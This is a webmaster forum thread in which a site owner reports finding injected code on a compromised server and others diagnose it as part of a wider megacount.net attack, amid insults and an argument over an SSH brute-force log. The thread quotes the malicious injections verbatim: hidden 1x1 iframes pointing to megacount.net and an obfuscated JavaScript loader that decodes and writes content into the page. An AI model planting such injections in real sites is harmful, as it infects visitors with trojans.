Our server seems hacked??
 

Just found this HTML in one of our biggest pages .. we didn't place it there

<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Anyone?

are you using webair?

yup see many threads on megacount hack

yep, you have been hacked, and have some work ahead of you. Do a search for megacount and you will have plenty to read

Yes, its compromiced.
There are a few posts about it here as well. It hit Webair pretty hard including one of our virtual plans

you've been hacked

p.s. put "megacount" in google for thread

welcome to the club

Nope, JupiterHosting

http://www.grisoft.com/doc/trial/lng.../tpl01?prd=asw

download the trial and clean up your PC. It installs a trojan and 2 counts of malware

BTW. the site in your Sig in infected as well - please remove it before someone click it

Finding this code on some of our index files as well..

<script language="JavaScript">e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF%D5% DC%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5 %D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%9 3%93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93% 9C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81 %8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%8 0";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

start reinstalling your servers, you are distributing trojans

Really?? So this is much more that the altered HTML I'm finding?

fucking-around-and-business-discussion/662380-hacked-megacount-net.html
fucking-around-and-business-discussion/660506-getting-hacked.html
fucking-around-and-business-discussion/661811-responce-2-getting-hacked.html
fucking-around-and-business-discussion/662468-martina-warren-trojan-site.html

When the fuck will people start securing thier shit *shakes head*

you should read up on the topic before making bullshit comments like that. It's among other things a hole in PhP and Cpanel. not something you can fix yourself

you are probabbly webmaster number 25612 that got infected, it's been a security whole now for weeks with patches available, only seems everyone is too lazy to install them

I'm well aware of what this asshat has been doing, they're also VERY easily fixed.

http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

Takes all of 3 minutes to patch.

Now don't you have postwhores to steal domains from or somthing?

dissipate
Join Date: Nov 2005
Posts: 5,787

.. maybe I should check your domains

Was the intended to somehow worry me?

Oct 9 07:36:24 strife sshd[4128]: Failed password for root from 83.73.6.174 port 1408 ssh2

Awww, looks like someone from denmark is trying to brute force one of my machines.

I wonder who this could be.

give me a fucking break. My servers get proped 24/7 from proxyes all around the world.. grow the hell up !! All you did was check you logs to see if a danish Host had loaded one of your sig banners. Sorry to tell you that the IP listed is not mine

One hell of a coincidence then, eh? Danish Guy makes comment about looking at my boxes... and im getting ssh connections from a danish IP.

Dude - I LIVE IN SWEDEN !!!!!!!! My company resides in Denmark, and I'm danish, but my house is in Sweden. Its public knowledge here on GFY and have been posted a million times over and over again.

I never commented on your boxes. You made a joke regarding buying a boadwhores domain, and I replied "maybe I should check your domains"

As far as I know you don't use SSH to check for domain expiration - but then again, i'm not as smart as you clearly are.